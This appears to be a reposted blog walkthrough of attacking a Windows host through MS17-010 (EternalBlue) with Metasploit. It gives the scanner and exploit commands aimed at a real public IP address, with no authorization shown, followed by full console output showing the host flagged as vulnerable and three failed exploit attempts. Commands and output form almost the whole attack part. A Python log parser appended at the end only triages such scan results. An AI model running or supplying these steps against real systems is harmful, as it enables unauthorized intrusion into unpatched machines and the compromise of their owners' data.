MS17-010 penetration test procedure
Author: Internet
Commands used
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 47.92.84.135
run
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 47.92.84.135
exploit
Details
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 47.92.84.135
RHOSTS => 47.92.84.135
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 47.92.84.135:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 47.92.84.135
RHOSTS => 47.92.84.135
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 172.17.0.2:4444
[+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 47.92.84.135:445 - Connecting to target for exploitation.
[+] 47.92.84.135:445 - Connection established for exploitation.
[+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
[*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 47.92.84.135:445 - Trying exploit with 12 Groom Allocations.
[*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
[*] 47.92.84.135:445 - Starting non-paged pool grooming
[+] 47.92.84.135:445 - Sending SMBv2 buffers
[+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 47.92.84.135:445 - Sending final SMBv2 buffers.
[*] 47.92.84.135:445 - Sending last fragment of exploit packet!
[*] 47.92.84.135:445 - Receiving response from exploit packet
[+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 47.92.84.135:445 - Sending egg to corrupted connection.
[*] 47.92.84.135:445 - Triggering free of corrupted buffer.
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 47.92.84.135:445 - Connecting to target for exploitation.
[+] 47.92.84.135:445 - Connection established for exploitation.
[+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
[*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 47.92.84.135:445 - Trying exploit with 17 Groom Allocations.
[*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
[*] 47.92.84.135:445 - Starting non-paged pool grooming
[+] 47.92.84.135:445 - Sending SMBv2 buffers
[+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 47.92.84.135:445 - Sending final SMBv2 buffers.
[*] 47.92.84.135:445 - Sending last fragment of exploit packet!
[*] 47.92.84.135:445 - Receiving response from exploit packet
[+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 47.92.84.135:445 - Sending egg to corrupted connection.
[*] 47.92.84.135:445 - Triggering free of corrupted buffer.
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 47.92.84.135:445 - Connecting to target for exploitation.
[+] 47.92.84.135:445 - Connection established for exploitation.
[+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
[*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 47.92.84.135:445 - Trying exploit with 22 Groom Allocations.
[*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
[*] 47.92.84.135:445 - Starting non-paged pool grooming
[+] 47.92.84.135:445 - Sending SMBv2 buffers
[+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 47.92.84.135:445 - Sending final SMBv2 buffers.
[*] 47.92.84.135:445 - Sending last fragment of exploit packet!
[*] 47.92.84.135:445 - Receiving response from exploit packet
[+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 47.92.84.135:445 - Sending egg to corrupted connection.
[*] 47.92.84.135:445 - Triggering free of corrupted buffer.
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >
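The transcript above ends with a "likely VULNERABLE" verdict from the scanner but no session from the exploit module. To triage output like this from an authorized scan, here is an added Python parser (not the page's or Metasploit's own code) that reads msfconsole lines in the format shown, reassembles the CORE raw buffer from the hex-dump rows and checks it against the banner the scanner reported, and records each groom attempt and the no-session outcome; the sample log and the address 192.0.2.10 are constructed.

```python
import re
from dataclasses import dataclass
# Constructed sample, not the page's transcript: lines in the format that the smb_ms17_010
# scanner and the ms17_010_eternalblue module print (192.0.2.10 is a documentation address).
SAMPLE_LOG = """\
[+] 192.0.2.10:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 192.0.2.10:445 - CORE raw buffer dump (53 bytes)
[*] 192.0.2.10:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.0.2.10:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 192.0.2.10:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 192.0.2.10:445 - 0x00000030 61 63 6b 20 31 ack 1
[*] 192.0.2.10:445 - Trying exploit with 12 Groom Allocations.
[*] Exploit completed, but no session was created.
"""
LINE_RE = re.compile(r"^\[[+*\-]\] (?:(\d+(?:\.\d+){3}):(\d+) - )?(.*)$")
DUMP_HDR_RE = re.compile(r"raw buffer dump \((\d+) bytes\)")
DUMP_ROW_RE = re.compile(r"^0x([0-9a-f]{8}) (.*)$")
GROOM_RE = re.compile(r"Trying exploit with (\d+) Groom Allocations")
@dataclass
class HostReport:
    likely_vulnerable: bool = False
    os_banner: str = ""          # text after "VULNERABLE to MS17-010! - "
    core_buffer: bytes = b""     # reassembled from the hex-dump rows
    groom_sizes: tuple = ()      # groom allocation count of each exploit attempt
    no_session: bool = False     # "Exploit completed, but no session was created."
def parse_msf_log(text):
    reports, current, expected = {}, None, 0   # expected: bytes announced by the dump header
    for raw in text.splitlines():
        if not (m := LINE_RE.match(raw)):
            continue
        host, port, msg = m.groups()
        current = reports.setdefault(f"{host}:{port}", HostReport()) if host else current
        if current is None:      # e.g. handler start-up lines printed before any host is named
            continue
        if (hdr := DUMP_HDR_RE.search(msg)):
            expected, current.core_buffer = int(hdr.group(1)), b""
        elif (row := DUMP_ROW_RE.match(msg)) and len(current.core_buffer) < expected:
            # Take only the bytes still owed (max 16 per row), since the trailing ASCII column can look like hex.
            if int(row.group(1), 16) != len(current.core_buffer):
                raise ValueError(f"hex-dump offset mismatch at 0x{row.group(1)}")
            owed = min(16, expected - len(current.core_buffer))
            current.core_buffer += bytes(int(t, 16) for t in row.group(2).split()[:owed])
        elif "likely VULNERABLE to MS17-010" in msg:
            current.likely_vulnerable, current.os_banner = True, msg.partition("! - ")[2]
        elif (g := GROOM_RE.search(msg)):
            current.groom_sizes += (int(g.group(1)),)
        elif "no session was created" in msg:
            current.no_session = True
    return reports
```

A decoded buffer that matches the reported banner confirms the OS string came straight from the SMB reply; a mismatch or an offset error means the log was truncated or mangled and the verdict should be re-checked rather than trusted.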
Tags: 47.92, 445, 010, exploit, ms17, 84.135, procedure, smb  Source: https://www.cnblogs.com/liuhuan086/p/13068752.html